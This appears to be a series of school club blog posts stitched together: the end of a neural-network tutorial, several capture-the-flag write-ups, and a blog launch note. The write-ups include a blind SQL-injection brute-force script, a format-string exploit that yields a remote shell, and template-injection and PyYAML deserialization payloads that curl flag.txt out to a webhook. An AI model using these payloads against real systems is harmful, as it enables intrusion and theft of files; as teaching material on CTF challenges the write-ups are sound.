        dcda_1 = np.matmul(dcdz_2, self.W_1)
        dcdz_1 = np.matmul(dcda_1, np.diag(self.sigmoid_derivative(self.z_1).reshape(3)))
        dcdb_0 = dcdz_1
        dcdw_0 = np.matmul(self.a_0, dcdz_1)
        self.db_1 = dcdb_1.T
        self.dw_1 = dcdw_1.T
        self.db_0 = dcdb_0.T
        self.dw_0 = dcdw_0.T
```

Next, I program gradient descent. There are 3 kinds of gradient descent when there are multiple datapoints: stochastic, batch, and mini-batch. In stochastic gradient descent (SGD), the weights are updated after each single sample is run, which obviously makes your steps towards the ideal value very chaotic. In batch gradient descent, the weights are updated after every sample has been run, and the net step is the sum/average of all the $\nabla F(x)$, which is less chaotic, but steps are less frequent.

Of course, in real life we can never know which algorithm is better without making an assumption about the data (No Free Lunch theorem). A good compromise is mini-batch gradient descent, which is like batch gradient descent but uses smaller chunks of the datapoints at every step. In this case, I use batch gradient descent.
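For completeness, mini-batch index selection is typically done by shuffling the dataset each epoch and splitting it into fixed-size chunks. The sketch below is illustrative (the names and sizes are my own, not from the post):

```python
import numpy as np

# Draw mini-batch indices: shuffle once per epoch, then slice into chunks.
rng = np.random.default_rng(0)
n_samples, batch_size = 10, 4
indices = rng.permutation(n_samples)
batches = [indices[i:i + batch_size] for i in range(0, n_samples, batch_size)]

# every sample appears in exactly one batch per epoch
assert sorted(np.concatenate(batches).tolist()) == list(range(n_samples))
```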

```
nndata = NNdata()
learning_rate = 0.1
for i in range(10000):
    db_1_batch = []
    dw_1_batch = []
    db_0_batch = []
    dw_0_batch = []
    c = []
    for j in range(4):
        nndata.feed_forward(data[j][0])
        c.append(nndata.loss(data[j][1]))
        nndata.back_prop(data[j][1])
        db_1_batch.append(nndata.db_1)
        dw_1_batch.append(nndata.dw_1)
        db_0_batch.append(nndata.db_0)
        dw_0_batch.append(nndata.dw_0)
    if (i+1) % 1000 == 0:
        print("loss (%d/10000): %.3f" % (i+1, sum(c)/4))
    nndata.b_1 -= learning_rate * sum(db_1_batch)
    nndata.W_1 -= learning_rate * sum(dw_1_batch)
    nndata.b_0 -= learning_rate * sum(db_0_batch)
    nndata.W_0 -= learning_rate * sum(dw_0_batch)
```

Output:

```
loss (1000/10000): 0.245
loss (2000/10000): 0.186
loss (3000/10000): 0.029
loss (4000/10000): 0.007
loss (5000/10000): 0.003
loss (6000/10000): 0.002
loss (7000/10000): 0.002
loss (8000/10000): 0.001
loss (9000/10000): 0.001
loss (10000/10000): 0.001
```

Voila! We have officially programmed a neural network from scratch. Pat yourself on the back for reading through this. And of course, if you bothered to code this out, try porting it over to different languages like Java, JS or even C (yikes, why would anyone subject themselves to that?).

In the next part, it is time for the actual hard part. Good luck!

A lot of people think I just collated a bunch of sources and rephrased them, and honestly I walked into writing this thinking I would be doing just that. The problem is that many sources that have attempted this only cover the single-to-multi-perceptron layer case and not the multi-to-multi-perceptron case, which is pretty sad. The true math is hidden behind mountains of research papers that loosely connect to give the results of this blogpost, which I am too incompetent to connect by myself. So, I just did the math myself. (The math may not usually be presented this way, but it works, so it should be correct.) Yes, it was a bit crazy, and it destroyed me to my core. This was a great character-building moment for me. So these are the actual sources:

- https://numpy.org/
- https://en.wikipedia.org/wiki/Gradient_descent
- https://en.wikipedia.org/wiki/Matrix_calculus
- https://en.wikipedia.org/wiki/Tensor_calculus
- https://en.wikipedia.org/wiki/Ricci_calculus
- https://en.wikipedia.org/wiki/XNOR_gate
- CS5131 Notes (Special thanks to Mr Chua and Mr Ng)

(Excruciatingly edited by Prannaya)

Ok, you got the flag, but I bet you'll never get my password!

Based on the description, the flag is probably the password. Even though we logged in as admin in the last challenge, we still do not know the password.

To get the password, we can check it one character at a time to reduce the number of tries. Trying entire password strings at a time would require an exponential number of tries and is unrealistic.
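To see why, a quick back-of-the-envelope count (my own illustration; the alphabet of 29 symbols matches the `chars` string used in the script below, and 37 is the length of the flag eventually recovered):

```python
# Worst-case guess counts for a 37-character password over a 29-symbol alphabet.
alphabet = 29          # a-z, '_', '{', '}'
length = 37

per_character = alphabet * length      # probe one position at a time
all_at_once = alphabet ** length       # guess whole strings blindly

assert per_character == 1073           # entirely practical
assert all_at_once > 10 ** 50          # hopeless by comparison
```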

The flag format is `flag{...}`, where the characters consist of lowercase letters, `{}` and `_`. We can quickly code up a little script to find the password. In this writeup we will be using `node.js` for the simplicity and non-pythonic syntax.

```
const fetch = require("node-fetch");
const FormData = require("form-data");

let chars = "abcdefghijklmnopqrstuvwxyz_{}".split("");
let password = [];

async function verify(i, c) {
  const form = new FormData();
  form.append(
    "username",
    `admin' and SUBSTRING(password, ${i + 1}, 1)='${c}' --`,
  );
  const res = await fetch("http://35.240.143.82:4208/login", {
    method: "POST",
    body: form,
  });
  const text = await res.text();
  return text !== "Login failed";
}

async function step(i) {
  for (let c of chars) {
    if (await verify(i, c)) return c;
  }
  return null;
}

async function brute_force() {
  let i = 0;
  while (true) {
    password[i] = await step(i);
    console.log(password.join(""));
    if (!password[i]) break;
    i++;
  }
  console.log(password.join(""));
}

brute_force();
```

As before, we use `admin'` to escape the username field and `--` to skip the password check. However, we add our own check in the middle: `SUBSTRING(password, i, 1)` works the same way a normal substring would, except SQL is 1-indexed (kinda weird, but yeah).

What happens looks like this:

- `select id from users where name='admin' and SUBSTRING(password, 1, 1)='a' --` (fail)
- `select id from users where name='admin' and SUBSTRING(password, 1, 1)='b' --` (fail)
- ...
- `select id from users where name='admin' and SUBSTRING(password, 1, 1)='f' --` (success)
- `select id from users where name='admin' and SUBSTRING(password, 2, 1)='a' --` (fail)
- ...

`verify` makes a request to check whether the password has the character in variable `c` at position `i`.

`step` simply tries all characters for a position until one hits.

`brute_force()` steps through all positions until a correct character can't be found for a position, which would most likely be the end of the password.

```
f
fl
fla
...
flag{oops_looks_like_youre_not_blind
flag{oops_looks_like_youre_not_blind}
flag{oops_looks_like_youre_not_blind}
flag{oops_looks_like_youre_not_blind}
```

Flag obtained

Well, I haven't taken CS6131 yet but databases should be easy right??

From the description we can see the keyword "databases"; based on prior knowledge of the module CS6131, we can be pretty sure this is related to SQL.

Since the server builds its SQL command with a simple template string, we can apply simple SQL injection and skip the password check.

```
@app.route("/login", methods=["post"])
def login():
    username = request.form.get('username', default='', type=str)
    password = request.form.get('password', default='', type=str)
    users = db.execute(f"select id from users where name='{username}' and password='{password}'").fetchall()
    if users:
        return Response(flag1, mimetype='text/plain')
    return Response('Login failed', mimetype='text/plain')
```

In SQL, comments can be made with `--`. To skip the password check, we can simply input `admin' --` as the username and leave the password blank, which results in the following command:

```
select id from users where name='admin' --' and password=''
```
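The bypass can be reproduced end-to-end against an in-memory SQLite database (my own self-contained sketch; the real challenge's schema is assumed to be similar):

```python
import sqlite3

# Reproduce the injection locally against an assumed-similar schema.
db = sqlite3.connect(":memory:")
db.execute("create table users (id integer, name text, password text)")
db.execute("insert into users values (1, 'admin', 'supersecret')")

username, password = "admin' --", ""
query = f"select id from users where name='{username}' and password='{password}'"
rows = db.execute(query).fetchall()

assert rows == [(1,)]   # logged in without knowing the password
```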

Everything behind `--` is ignored, and we successfully log in as admin:

```
flag{you_can_pass_cs6131_now}
```

Flag obtained

AppVenture Login page must be the most secure right? URL: http://35.240.143.82:4208/

Hint:

What's the first thing you do when pentesting a website?

One of the common files that websites contain is `robots.txt`, which tells scrapers like Googlebot which paths they can and should not crawl. In this case, the robots file contains a path to the source code of the website, and the flag is inside the source code.

```
User-agent: *
Disallow: /c7179ef35b2d458d6f2f68044816e145/main.py
```
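The same `robots.txt` can be parsed with Python's standard library (an illustrative aside; a disallowed path like this is exactly what a pentester inspects first):

```python
import urllib.robotparser

# Parse the challenge's robots.txt rules and query them.
rp = urllib.robotparser.RobotFileParser()
rp.parse([
    "User-agent: *",
    "Disallow: /c7179ef35b2d458d6f2f68044816e145/main.py",
])

assert not rp.can_fetch("*", "/c7179ef35b2d458d6f2f68044816e145/main.py")
assert rp.can_fetch("*", "/")
```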

```
...
flag0 = "flag{you_can_use_automated_tools_like_nikto_to_do_this}"
...
```

Flag obtained

My wonderful app works both as an echo server and a file lister!

Bet you can't hack it! `nc 35.240.143.82 4203`

Only the compiled `chal` file was given; after decompiling it with Ghidra, I get:

```
undefined8 main(void)
{
    int32_t iVar1;
    char *format;
    setup();
    while( true ) {
        fgets(&format, 0x70, _stdin);
        iVar1 = strncmp(&format, "quit", 4);
        if (iVar1 == 0) break;
        printf(&format);
    }
    system("/bin/ls");
    return 0;
}
```

As we can see, `printf` is used to print the user's input directly as the format string.

This challenge is in the format string attack category, which I can verify with a simple `%x`

```
$ nc 35.240.143.82 4203
%x
402004
%s
quit
```

I can use pwntools to quickly create our format string payload. I first have to find the offset, which can easily be done with:

```
from pwn import *

conn = remote("35.240.143.82", 4203)
context.clear(arch='amd64')

def send_payload(p):
    conn.wait(1)
    conn.sendline(p)
    return conn.recv()

print("offset =", FmtStr(execute_fmt=send_payload).offset)
```

```
[x] Opening connection to 35.240.143.82 on port 4203
[x] Opening connection to 35.240.143.82 on port 4203: Trying 35.240.143.82
[+] Opening connection to 35.240.143.82 on port 4203: Done
[*] Found format string offset: 6
offset = 6
[*] Closed connection to 35.240.143.82 port 4203
```

In the decompiler, I noticed that `/bin/ls` is located at `0x00404058`. If I edit `/bin/ls` into `/bin/sh`, as they have the same number of characters, I can gain remote shell access. Hence, I will be using `fmtstr_payload` from pwntools:

```
from pwn import *
conn = remote("35.240.143.82", 4203)
context.clear(arch='amd64')
payload = fmtstr_payload(0x6, {0x404058: b'/bin/sh'}, write_size='short')
conn.wait(1)
print("sending" + str(payload))
conn.sendline(payload)
print(conn.recv())
conn.sendline("quit")
conn.interactive()
```

We will be writing the string `/bin/sh` to address `0x404058` with offset `6`. After sending the payload, `/bin/ls` will be changed to `/bin/sh`. This means that after I exit the loop with `quit`, it should give us shell access. I then switch to interactive mode to take advantage of the shell more easily.

```
system("/bin/sh");
```

Indeed we gain remote shell access.

By running the command `ls`, I find `flag.txt`, and with `cat flag.txt`:

```
cat flag.txt
flag{why_would_printf_be_able_to_write_memory????!!}
```

Flag obtained

If you run the following you can find the message I left

`cd ~ cd w cat README.txt Hello, I was here ;) ZY`

I've added a bunch of filters, so my app must be really secure now.

Flag in `flag.txt`

URL: http://35.240.143.82:4209/

The source, `main.py`, is included, hence we should take a look.

```
import secrets
from flask import Flask, render_template_string, request

app = Flask(__name__)

@app.route("/")
def index():
    name = request.args.get("name", default="World")
    # Evil hacker cannot get past now!
    blocklist = ["{{", "}}", "__", "subprocess", "flag", "popen", "system", "os", "import", "read", "flag.txt"]
    for bad in blocklist:
        name = name.replace(bad, "")
    return render_template_string(f"<h1> Hello, {name}")
```

Since the server uses `render_template_string`, it is vulnerable to `{{}}` template string attacks. If we use `{{ 'Hello'+' '+'World' }}` for the name, it gives us `Hello World`, as the string inside is run as code. However, as we can see, there is a blocklist, and it includes `{{` and `}}`.

To bypass this filter, we can simply insert blocklisted words inside of blocklisted words. For example, `{flag{}flag}` will not trigger the checks for `{{` and `}}`, but will have `flag` removed when checking for `flag`, resulting in `{{}}` as the end output.
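The trick can be reproduced in a few lines (a minimal local sketch with a shortened blocklist): a single-pass replace over a blocklist reassembles the banned token instead of removing it.

```python
# Single-pass blocklist filtering, as the server does it.
blocklist = ["{{", "}}", "__", "flag"]
name = "{flag{ ... }flag}"
for bad in blocklist:
    name = name.replace(bad, "")

# removing "flag" glues the braces back together
assert name == "{{ ... }}"
```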

Making use of this, we can construct our payloads with the help of a little script. I had trouble reading the file directly, so I decided to just send the file contents out via curl; webhook.site is an easy-to-use site for receiving the data.

```
bypass = ["{{", "}}", "__", "subprocess", "flag", "popen", "system", "os", "import", "read"]
bypass.reverse()
# start from the payload we want the server to end up with
payload = '{{(().__class__.__bases__[0].__subclasses__()[118].__init__.__globals__["__builtins__"])["__im"+"port__"]("o"+"s").system("curl -X POST --data-binary @flflag.txtag.txt https://webhook.site/40a3fae4-f378-4100-837c-8f94953fbbc9")}}'
for toby in bypass:
    payload = payload.replace(toby, toby[0] + "read" + toby[1:])
print(payload)

# simulate the server's blocklist to check the payload survives it
name = payload
blocklist = ["{{", "}}", "__", "subprocess", "flag", "popen", "system", "os", "import", "read", "flag.txt"]
for bad in blocklist:
    name = name.replace(bad, "")
print(f"<h1> Hello, {name}")
```

If one simply uses `__import__`, one soon realises that it does not exist; this could have been done by deleting built-ins from the Python runtime. We could restore the built-ins via `reload(__builtins__)`, but that is, obviously, also deleted. We need to find `__import__` somehow.

With some experimenting, we can find that

```
>>> ().__class__.__bases__
(<type 'object'>,)
```

The tuple inherits directly from `object`, hence we can find the list of types (everything that extends `object`) by sending the payload `{{().__class__.__bases__[0].__subclasses__()}}`:

```
Hello, [<class 'type'>, <class 'async_generator'>, <class 'int'>, <class 'bytearray_iterator'>, <class 'bytearray'>, <class 'bytes_iterator'>, <class 'bytes'>... <class 'flask.blueprints.BlueprintSetupState'>]
```
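The same introspection chain is runnable locally: every Python object carries a route back to `object`, and from there to every loaded class.

```python
# The tuple's class is tuple, whose only base is object.
assert ().__class__ is tuple
assert ().__class__.__bases__ == (object,)

# object.__subclasses__() lists every class currently loaded by the interpreter.
subclasses = ().__class__.__bases__[0].__subclasses__()
assert type in subclasses
```

(The index `118` used in the payload depends on the server's interpreter and loaded modules, which is why the full list had to be dumped first.)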

Much of the output is useless, but `_frozen_importlib_external.FileLoader` looks a bit suspicious (it is at position 118): `{{().__class__.__bases__[0].__subclasses__()[118]}}`

```
Hello, <class '_frozen_importlib_external.FileLoader'>
```

Just verifying that the class is the `FileLoader`; now let's see what builtins this `FileLoader` has: `{{().__class__.__bases__[0].__subclasses__()[118].__init__.__globals__["__builtins__"]}}`

```
Hello, {'__name__': 'builtins' ... '__import__': <built-in function __import__>, ...help, or help(object) for help about object.}
```

**Hooray!** We found `__import__`; now we just have to combine the payload into

```
{{(().__class__.__bases__[0].__subclasses__()[118].__init__.__globals__["__builtins__"])["__im"+"port__"]("o"+"s").system("curl -X POST --data-binary @flflag.txtag.txt https://webhook.site/40a3fae4-f378-4100-837c-8f94953fbbc9")}}
```

`flag.txt` has to be bypassed manually: it contains `flag`, and because `flag.txt` itself sits *after* `read` in the blocklist, a simple `read`-split would be reassembled and then stripped anyway. Writing it as `flflag.txtag.txt` survives: removing the inner `flag.txt` leaves a fresh `flag.txt` behind.

```
{read{(()._read_class_read_._read_bases_read_[0]._read_subclasses_read_()[118]._read_init_read_._read_globals_read_["_read_builtins_read_"])["_read_im"+"port_read_"]("o"+"s").sreadystem("curl -X POST --data-binary @flfreadlag.txtag.txt https://webhook.site/40a3fae4-f378-4100-837c-8f94953fbbc9")}read}
<h1> Hello, {{(().__class__.__bases__[0].__subclasses__()[118].__init__.__globals__["__builtins__"])["__im"+"port__"]("o"+"s").system("curl -X POST --data-binary @flag.txt https://webhook.site/40a3fae4-f378-4100-837c-8f94953fbbc9")}}
```

The first line is our encoded payload; the second is the result of running the same blocklist operations the server performs, and the resulting string looks correct.
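The filename trick can also be checked in isolation: running the server's blocklist over the encoded `flfreadlag.txtag.txt` yields exactly `flag.txt`:

```python
# Apply the server's blocklist removals to the encoded filename.
blocklist = ["{{", "}}", "__", "subprocess", "flag", "popen", "system", "os", "import", "read", "flag.txt"]
s = "flfreadlag.txtag.txt"
for bad in blocklist:
    s = s.replace(bad, "")
print(s)  # flag.txt
```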

`http://35.240.143.82:4209/?name={read{(()._read_class_read_._read_bases_read_[0]._read_subclasses_read_()[118]._read_init_read_._read_globals_read_["_read_builtins_read_"])["_read_im"+"port_read_"]("o"+"s").sreadystem("curl -X POST --data-binary @flfreadlag.txtag.txt https://webhook.site/40a3fae4-f378-4100-837c-8f94953fbbc9")}read}`

And after checking webhook.site, we receive:

```
flag{server_side_rendering_is_fun_but_dangerous_sometimes}
```

Flag obtained

]]>You've used espace2, but what about espace0?

The flag is in `flag.txt`.

As before, the source `main.py` was given:

```
from flask import Flask, request, render_template, Response
import yaml

app = Flask(__name__)
assert yaml.__version__ == "5.3.1"

@app.route("/")
def index():
    return render_template("./index.html")

@app.route("/", methods=["POST"])
def welcome():
    student_data = request.form.get("student_data")
    if not student_data:
        return Response("Please specify some data in YAML format", mimetype='text/plain')
    student_data = yaml.load(student_data)
    required_fields = ["id", "name", "class"]
    if type(student_data) != dict or "student" not in student_data or any(x not in student_data["student"] for x in required_fields):
        return Response("Malformed data. Please try again.", mimetype='text/plain')
    student = student_data["student"]
    return f"<h1>Welcome, {student['name']} ({student['id']})</h1> <br>Your class is <b>{student['class']}</b>"
```

There are no obvious vulnerabilities in this file, but the `assert yaml.__version__ == "5.3.1"` line is quite suspicious. A quick Google search for `pyyaml 5.3.1 vulnerabilities` leads us to https://security.snyk.io/vuln/SNYK-PYTHON-PYYAML-590151, an RCE rated 9.8: in this version, even the default `FullLoader` that `yaml.load` falls back to can be tricked into executing arbitrary Python.

Conveniently, a `uiuctf` writeup explaining how the exploit works is linked there: https://hackmd.io/@harrier/uiuctf20. Apparently it was a zero-day vulnerability first used in a CTF, what a chad move. Since googling is allowed in CTFs, we can simply adapt their payload:

`!!python/object/new:tuple [!!python/object/new:map [!!python/name:eval , [ 'PAYLOAD_HERE' ]]]`

`!!python/object/new:tuple [!!python/object/new:map [!!python/name:eval , [ '__import__("os").system("curl -X POST --data-binary @flag.txt https://webhook.site/40a3fae4-f378-4100-837c-8f94953fbbc9")' ]]]`

And after checking webhook.site for the received curl request

```
flag{yet_another_mal-coded_library}
```

Flag obtained
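For completeness, the fix on the application side is to use `yaml.safe_load`, which refuses to construct arbitrary Python objects. A quick sketch (assumes PyYAML is installed; any reasonably recent version behaves this way):

```python
import yaml

# safe_load rejects python/* tags outright, so the gadget tag from the
# exploit fails with a ConstructorError instead of running code.
try:
    yaml.safe_load("!!python/object/new:tuple []")
except yaml.YAMLError as e:
    print(type(e).__name__)  # ConstructorError
```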

]]>```
console.log("Hello, World!");
```

Jokes aside, while we don't have a fixed posting schedule at present, here are some things you can expect: write-ups after our CTF events, Medium-style articles by our members on the latest tech news, reflections and sharings on projects, and even musings from interesting experiences and events we hold for the school and community.

Now, if you're curious why this is a thing: my motivation for redesigning the AppVenture website (again) was to make something simpler and more maintainable in the future. I actually thought the original website in Go was really nice, but because AppVenture is moving to TypeScript and Vue, it would be difficult to find people who can continue to maintain it in the long term. I didn't like the next version in Nuxt.js either, because with the little content we had, setting up a database felt like overkill; it also made backups more annoying than simply copying a git repository around. And that's how we ended up with Gridsome.

Since we were going to redesign the site anyway, I thought it would be a good chance to include more than just a project showcase. For an interest group, a blog seemed like a great way for members to share any cool things they may be up to, especially with the new initiatives launched this year, such as the cybersecurity division and monthly sharings. Of course, I can't predict how this will go, since it launches after I graduate, but I'm pretty optimistic about it.

If you're interested in this blog, stay tuned for more!

(Psst: if you're a NUSHie interested in writing something, or simply in cross-posting your articles here, feel free to contact us!)

]]>